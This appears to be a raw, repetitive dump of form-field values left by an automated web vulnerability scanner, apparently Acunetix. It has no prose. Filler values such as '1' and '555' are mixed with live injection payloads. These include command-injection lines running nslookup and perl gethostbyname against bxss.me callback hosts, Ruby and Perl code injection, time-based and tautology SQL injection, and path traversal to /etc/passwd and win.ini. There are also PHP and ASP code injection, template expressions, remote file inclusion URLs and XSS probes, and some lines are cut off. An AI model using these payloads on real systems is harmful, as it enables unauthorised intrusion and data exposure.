1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
1'"
1
1
\
1
1
1 ????%2527%2522
1
1
@@XxrMQ
1
1
JyI=
1
1
?'?"
1
1
?''?""
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1'"
555
1
\
555
1
1 ????%2527%2522
555
1
@@bFoZU
555
1
JyI=
555
1
?'?"
555
1
?''?""
555
1'"
1
555
\
1
555
1 ????%2527%2522
1
555
@@SIxkk
1
555
JyI=
1
555
?'?"
1
555
?''?""
1
555
1
1
"+"A".concat(70-3).concat(22*4).concat(105).concat(86).concat(116).concat(69)+(require"socket"
Socket.gethostbyname("hitby"+"bnqhuvqlac964.bxss.me.")[3].to_s)+"
1
1
555
1
1
'+'A'.concat(70-3).concat(22*4).concat(120).concat(73).concat(119).concat(76)+(require'socket'
Socket.gethostbyname('hitrv'+'dppndxtw30ab8.bxss.me.')[3].to_s)+'
1
1
555
1
1
555
1
"+"A".concat(70-3).concat(22*4).concat(122).concat(89).concat(117).concat(76)+(require"socket"
Socket.gethostbyname("hitus"+"ngzlifhr81f6b.bxss.me.")[3].to_s)+"
555
1
'+'A'.concat(70-3).concat(22*4).concat(120).concat(90).concat(110).concat(76)+(require'socket'
Socket.gethostbyname('hitms'+'bscaxdsh92806.bxss.me.')[3].to_s)+'
555
"+"A".concat(70-3).concat(22*4).concat(106).concat(79).concat(99).concat(83)+(require"socket"
Socket.gethostbyname("hitqh"+"qqwqkvowc48cf.bxss.me.")[3].to_s)+"
1
555
'+'A'.concat(70-3).concat(22*4).concat(115).concat(85).concat(101).concat(76)+(require'socket'
Socket.gethostbyname('hiton'+'fbkyjkyp834fe.bxss.me.')[3].to_s)+'
1
555
1
1
HttP://bxss.me/t/xss.html?%00
1
1
bxss.me/t/xss.html?%00
1
1
555
1
1
555
1
HttP://bxss.me/t/xss.html?%00
555
1
bxss.me/t/xss.html?%00
555
HttP://bxss.me/t/xss.html?%00
1
555
bxss.me/t/xss.html?%00
1
555
1
1
555
1
1
555&n938542=v954391
1
1
555
1
1
555
1
1
555
1
1&n909299=v961582
555
1&n980181=v930783
1
555
1
1
555
1
1
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'????
1
1
Array
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'????
555
1
Array
555
1
1
555
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'????
1
555
Array
1
555
1
1
echo ibsfox$()\ wivlle\nz^xyu||a #' &echo ibsfox$()\ wivlle\nz^xyu||a #|" &echo ibsfox$()\ wivlle\nz^xyu||a #
1
1
&echo ayyedw$()\ uqwttj\nz^xyu||a #' &echo ayyedw$()\ uqwttj\nz^xyu||a #|" &echo ayyedw$()\ uqwttj\nz^xyu||a #
1
1
|echo pzbkcn$()\ vezelq\nz^xyu||a #' |echo pzbkcn$()\ vezelq\nz^xyu||a #|" |echo pzbkcn$()\ vezelq\nz^xyu||a #
1
1
(nslookup hitzkggaxdneg8946e.bxss.me||perl -e "gethostbyname('hitzkggaxdneg8946e.bxss.me')")
1
1
$(nslookup hitgypycvqehadec48.bxss.me||perl -e "gethostbyname('hitgypycvqehadec48.bxss.me')")
1
1
P3d9xaUO
1
1
&(nslookup hitwdhxwxhdpx9d5cb.bxss.me||perl -e "gethostbyname('hitwdhxwxhdpx9d5cb.bxss.me')")&'\"`0&(nslookup hitwdhxwxhdpx9d5cb.bxss.me||perl -e "gethostbyname('hitwdhxwxhdpx9d5cb.bxss.me')")&`'
1
1
-1 OR 2+727-727-1=0+0+0+1 --
1
1
|(nslookup hittnfhzdiefjaf619.bxss.me||perl -e "gethostbyname('hittnfhzdiefjaf619.bxss.me')")
1
1
-1 OR 2+463-463-1=0+0+0+1
1
1
`(nslookup hitecactepvft672e0.bxss.me||perl -e "gethostbyname('hitecactepvft672e0.bxss.me')")`
1
1
-1' OR 2+989-989-1=0+0+0+1 --
1
1
;(nslookup hitzmcivvwiws8e4b6.bxss.me||perl -e "gethostbyname('hitzmcivvwiws8e4b6.bxss.me')")|(nslookup hitzmcivvwiws8e4b6.bxss.me||perl -e "gethostbyname('hitzmcivvwiws8e4b6.bxss.me')")&(nslookup hitzmcivvwiws8e4b6.bxss.me||perl -e "gethostbyname('hitzmcivvwiws8e4b6.bxss.me')")
1
1
-1' OR 2+293-293-1=0+0+0+1 or 'fgSMbHIy'='
1
1
-1" OR 2+124-124-1=0+0+0+1 --
1
1
809'
1
1
qrhw4jZH
1
1
555
1
2JBGeTaE
555
1
1
555
pqjri2Vx
1
555
1
1
555
1
1
../../../../../../../../../../etc/passwd
1
1
555
1
1
../../../../../../../../../../windows/win.ini
1
1
555
1
1
555
1
1
555
1
1
../555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
echo lahgci$()\ jlywnd\nz^xyu||a #' &echo lahgci$()\ jlywnd\nz^xyu||a #|" &echo lahgci$()\ jlywnd\nz^xyu||a #
555
1
1
555
1
&echo ohvhdu$()\ ualsnz\nz^xyu||a #' &echo ohvhdu$()\ ualsnz\nz^xyu||a #|" &echo ohvhdu$()\ ualsnz\nz^xyu||a #
555
1
1
555
1
|echo jgzdxi$()\ bcayiw\nz^xyu||a #' |echo jgzdxi$()\ bcayiw\nz^xyu||a #|" |echo jgzdxi$()\ bcayiw\nz^xyu||a #
555
1
1
555
1
(nslookup hitaqcenspolad1458.bxss.me||perl -e "gethostbyname('hitaqcenspolad1458.bxss.me')")
555
1
1
555
1
$(nslookup hituhvwmlvlyzf482d.bxss.me||perl -e "gethostbyname('hituhvwmlvlyzf482d.bxss.me')")
555
1
../../../../../../../../../../etc/passwd
555
1
&(nslookup hitipqnvczxlzb397e.bxss.me||perl -e "gethostbyname('hitipqnvczxlzb397e.bxss.me')")&'\"`0&(nslookup hitipqnvczxlzb397e.bxss.me||perl -e "gethostbyname('hitipqnvczxlzb397e.bxss.me')")&`'
555
1
../../../../../../../../../../windows/win.ini
555
1
|(nslookup hitvqdfbrfdsoa9fcf.bxss.me||perl -e "gethostbyname('hitvqdfbrfdsoa9fcf.bxss.me')")
555
1
1
555
1
`(nslookup hitqxelnainxb5dcbc.bxss.me||perl -e "gethostbyname('hitqxelnainxb5dcbc.bxss.me')")`
555
1
../1
555
1
;(nslookup hittvuwhamkot8c8fd.bxss.me||perl -e "gethostbyname('hittvuwhamkot8c8fd.bxss.me')")|(nslookup hittvuwhamkot8c8fd.bxss.me||perl -e "gethostbyname('hittvuwhamkot8c8fd.bxss.me')")&(nslookup hittvuwhamkot8c8fd.bxss.me||perl -e "gethostbyname('hittvu
555
../../../../../../../../../../etc/passwd
1
555
echo entmxl$()\ msboav\nz^xyu||a #' &echo entmxl$()\ msboav\nz^xyu||a #|" &echo entmxl$()\ msboav\nz^xyu||a #
1
555
../../../../../../../../../../windows/win.ini
1
555
&echo jivjra$()\ rcvmmr\nz^xyu||a #' &echo jivjra$()\ rcvmmr\nz^xyu||a #|" &echo jivjra$()\ rcvmmr\nz^xyu||a #
1
555
1
1
555
|echo iifemw$()\ eckqgw\nz^xyu||a #' |echo iifemw$()\ eckqgw\nz^xyu||a #|" |echo iifemw$()\ eckqgw\nz^xyu||a #
1
555
../1
1
555
(nslookup hitiexedufkqv796ba.bxss.me||perl -e "gethostbyname('hitiexedufkqv796ba.bxss.me')")
1
555
1
1
if(now()=sysdate(),sleep(12),0)
1
1
response.write(9077777*9469055)
$(nslookup hituoheoayoxi49635.bxss.me||perl -e "gethostbyname('hituoheoayoxi49635.bxss.me')")
1
555
1
1
'+response.write(9077777*9469055)+'
&(nslookup hitjpebrtjsbn144f0.bxss.me||perl -e "gethostbyname('hitjpebrtjsbn144f0.bxss.me')")&'\"`0&(nslookup hitjpebrtjsbn144f0.bxss.me||perl -e "gethostbyname('hitjpebrtjsbn144f0.bxss.me')")&`'
1
555
1
1
"+response.write(9077777*9469055)+"
|(nslookup hitlfvnvsiusg022b3.bxss.me||perl -e "gethostbyname('hitlfvnvsiusg022b3.bxss.me')")
1
555
`(nslookup hitctxddrdcqx08477.bxss.me||perl -e "gethostbyname('hitctxddrdcqx08477.bxss.me')")`
1
555
;(nslookup hitvayspclkao49f22.bxss.me||perl -e "gethostbyname('hitvayspclkao49f22.bxss.me')")|(nslookup hitvayspclkao49f22.bxss.me||perl -e "gethostbyname('hitvayspclkao49f22.bxss.me')")&(nslookup hitvayspclkao49f22.bxss.me||perl -e "gethostbyname('hitvay
1
555
1
1
555
1
1
555
1
1
555
1
1
555
1
1
${9999514+10000308}
1
1
555
1
1
555
1
response.write(9783122*9611404)
555
1
1
555
1
1
555
1
'+response.write(9783122*9611404)+'
555
1
${9999490+10000329}
555
1
1
555
1
"+response.write(9783122*9611404)+"
555
${10000160+9999232}
1
555
response.write(9087973*9034630)
1
555
1
1
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
1
1
;print(md5(31337));
'+response.write(9087973*9034630)+'
1
555
1
1
';print(md5(31337));$a='
1
1
1some_inexistent_file_with_long_name%00.jpg
"+response.write(9087973*9034630)+"
1
555
1
1
";print(md5(31337));$a="
1
1
Http://bxss.me/t/fit.txt
1
1
)
1
1
${@print(md5(31337))}
1
1
http://bxss.me/t/fit.txt%3F.jpg
1
1
!(()&&!|*|*|
1
1
${@print(md5(31337))}\
1
1
^(#$!@#$)(()))******
1
1
bxss.me
1
1
'.print(md5(31337)).'
1
1
555
1
1
555
1
1
555
1
1
555
1
)
555
1
1
555
1
1
555
1
!(()&&!|*|*|
555
1
1
555
1
^(#$!@#$)(()))******
555
1
1
555
1
1
555
)
1
555
1
1
555
1
1
555
!(()&&!|*|*|
1
555
1
1
555
1
1
555
1
1
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z
^(#$!@#$)(()))******
1
555
1
1
555
1
1
555
1
1
Array
1
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
555
1
;print(md5(31337));
555
1
1
'"()
1
1some_inexistent_file_with_long_name%00.jpg
555
1
';print(md5(31337));$a='
555
1
Http://bxss.me/t/fit.txt
555
1
";print(md5(31337));$a="
555
1
http://bxss.me/t/fit.txt%3F.jpg
555
1
1
555
1
${@print(md5(31337))}
555
1
bxss.me
555
1
1
555
1
${@print(md5(31337))}\
555
1
Array
555
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
1
555
1
'.print(md5(31337)).'
555
1
'"()
555
1some_inexistent_file_with_long_name%00.jpg
1
555
;print(md5(31337));
1
555
Array
1
555
';print(md5(31337));$a='
1
555
Http://bxss.me/t/fit.txt
1
555
'"()
1
555
";print(md5(31337));$a="
1
555
1
1
'.gethostbyname(lc('hitle'.'lpdrulba9778a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(76).chr(114).chr(90).'
http://bxss.me/t/fit.txt%3F.jpg
1
555
${@print(md5(31337))}
1
555
bxss.me
1
555
${@print(md5(31337))}\
1
555
1
1
555'"()&%
'.print(md5(31337)).'
1
555
1
1
".gethostbyname(lc("hithn"."xjnwhgmd1d930.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(76).chr(108).chr(79)."
1
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
1
'"()&%
1
1
555
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
555
1
1
555
1
1
5559385311
1
1
/xfs.bxss.me
1
1
555
1
1
555
1
1
555
1
/xfs.bxss.me
555
1
'.gethostbyname(lc('hithl'.'qqzgrftl1db5e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(73).chr(116).chr(84).'
555
/xfs.bxss.me
1
555
1
1
0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z
1
".gethostbyname(lc("hitav"."ehkdjxvr81e60.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(73).chr(108).chr(86)."
555
1
1
'"
1
1